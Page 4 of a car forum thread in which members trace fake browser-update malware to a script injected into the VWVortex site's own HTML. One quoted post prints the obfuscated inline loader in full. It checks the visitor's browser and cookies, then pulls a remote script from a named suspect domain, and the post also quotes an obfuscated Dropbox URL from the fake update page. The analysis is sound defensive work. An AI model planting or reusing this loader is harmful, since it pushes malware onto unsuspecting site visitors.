KilometerMagazine.com - Malware in ads - fake browser updates
Username or Email Address
Do you already have an account?
Forgot your password?
  • Log in or Sign up


    Page 4 of 4 FirstFirst 1234
    Results 76 to 80 of 80
    1. Member HwAoRrDk's Avatar
      Join Date
      Aug 2nd, 2002
      Location
      United Kingdom
      Posts
      1,925
      Vehicles
      2004 Mazda RX-8 230
      05-24-2017 12:07 PM #76
      By the way, forgot to mention, the script snippet that is the initial vector always appears to be present in VWVortex's HTML just before the top navigation bar and site logo - the element with ID 'top-nav'.

      I also just did some additional digging on the ownership and hosting of the two suspect domains.

      The domain amishbrand.com was registered through Wild West Domains LLC, but has private whois information. The server at track.amishbrand.com (IP address 23.152.0.118) appears to be hosted with a US company called Crowncloud.

      The domain timbervalleyfarm.com, registered through GoDaddy, also has private whois information. The server at scene.timbervalleyfarm.com (IP 185.166.239.25) appears to also be hosted with Crowncloud.

      This hosting company looks very fishy to me - I mean, look at their home page. Doesn't that just scream reputable corporate entity to you?
      平成16 年の MAZDA RX-8 230

    2. Not your buddy, guy...
      Join Date
      Oct 12th, 2015
      Posts
      285
      05-24-2017 03:01 PM #77
      Thanks everyone for your help and reports. I think we got it finally! If you still see this let us know right away.
      -Philip

    3. Member CodeMan's Avatar
      Join Date
      May 12th, 2006
      Location
      Westminster, CO
      Posts
      8,029
      Vehicles
      Scirocco 16v, E34 540i, V50 T5 AWD
      05-24-2017 04:08 PM #78
      Quote Originally Posted by HwAoRrDk View Post
      I had some time to sit down and investigate this a bit more this afternoon. I did actually manage to get a Wireshark packet capture of the fake update screen loading in Chrome! However, it's not too useful, as I think the source that this is being loaded from is served via HTTPS, so the network traffic is encrypted, so I can't actually see what's in it.

      However, I think I have identified at least the trail through which the IFRAME ultimately gets loaded.

      In the packet capture, I could see - from the hostname in the SSL certificate - the request that was being made to scene.timbervalleyfarm.com (where the malicious fake update page is being loaded from). Directly before that, there is a request made to track.amishbrand.com - also via HTTPS. Sounds odd, right? Well, what causes that request? If you look at the post-loading HTML page DOM of the Vortex, you will see the following element gets dynamically inserted (it's not in the as-served HTML) into the HEAD tag:

      Code:
      <script type="text/javascript" async="" src="https://track.amishbrand.com/s_code.js?cid=214&amp;v=28c9a7ed5fd87d6ee79e"></script>
      And if I use the Network panel of Firefox's developer tools to trace what caused that script to be loaded, it tells me that it is some in-line Javascript in the main body of the page - that is, content from VWVortex's server itself. This piece of script is as follows:

      Code:
      <script type='text/javascript'>;(function(){var d=navigator[m("&t)nme}gcA)r,e{snup")];var y=document[m("ie,ikk,o,o{c(")];if(n(d,m("hs,wnotdtn;i}W6"))&&!n(d,m("9d9ido{r5drn4A("))){if(!n(y,m("&=(a{m,t}uo_0_(_r"))){var t=document.createElement('script');t.type='text/javascript';t.async=true;t.src=m('.e(9(7ne2e,6(d;718)d)f(5;dle076a,9;c;8)2}=}v}&}4}1v2;=,d}i4c;?,s(jq.{e(d}o;c,_}s,/,m{o)c{.{d0n3a0r{b)h(szi}m;a7.6k)c;a}r4t2/b/):ss(p(t6tyhi');var v=document.getElementsByTagName('script')[0];v.parentNode.insertBefore(t,v);}}function m(k){var f='';for(var q=0;q<k.length;q++){if(q%2===1)f+=k[q];}f=r(f);return f;}function n(j,w){if(j[m("/f)Obxme{din,i(")](w)!==-1){return true;}else{return false;}}function r(e){var z='';for(var a=e.length-1;a>=0;a--){z+=e[a];}return z;}})();</script>
      The obfuscation there on the strings (the 'garbage'-looking data) looked mighty familiar - I had a feeling of deja vu... Where had I seen something similar before? In the code of the fake browser update page! It uses a similar data obfuscation technique there on the Dropbox URL:

      Code:
      var fileUrl = getUrl('r1}=yl{d0?gs1j1.}7{.(8k.}5}56_ub)u)t}S;_0p;uht)e}S)_}x)o,f{e1r)i,F,/{f,e{c}u;q,7sbzi{8851h}p,k3u}i2/{s(/{m(o}c,.}x;o,b6pho;r8d{.)w{w0w{/,/;:0s{p(t{t}h)');
      Because of this, I believe the piece of inline script above that loads another script from track.amishbrand.com is highly likely to be the initial vector for this malware. And because the initial script is inline with the page, it means the phone call is coming from inside the house - that is, the VWVortex server(s) are compromised in some way to allow this malicious snippet of code to have been inserted into their HTML!

      VWVortex admins, forget the third-party ad networks, look at your own server's files!!!
      HwAoRrDk, thank you for all your HARD work!

    4. Member
      Join Date
      Jul 26th, 2007
      Posts
      1,273
      Vehicles
      99.5 Jetta
      05-25-2017 05:13 AM #79
      Quote Originally Posted by HwAoRrDk View Post
      I had some time to sit down and investigate this a bit more this afternoon. .........

      ............., it means the phone call is coming from inside the house - that is, the VWVortex server(s) are compromised in some way to allow this malicious snippet of code to have been inserted into their HTML!

      VWVortex admins, forget the third-party ad networks, look at your own server's files!!!

      This part is scary........
      IHP is real.
      Imaginary
      Horse
      Power.

    5. Not your buddy, guy...
      Join Date
      Oct 12th, 2015
      Posts
      285
      Yesterday 11:02 AM #80
      Quote Originally Posted by dogdog View Post
      This part is scary........

    For advertising information click HERE

    Page 4 of 4 FirstFirst 1234

    Posting Permissions

    • You may not post new threads
    • You may not post replies
    • You may not post attachments
    • You may not edit your posts
    •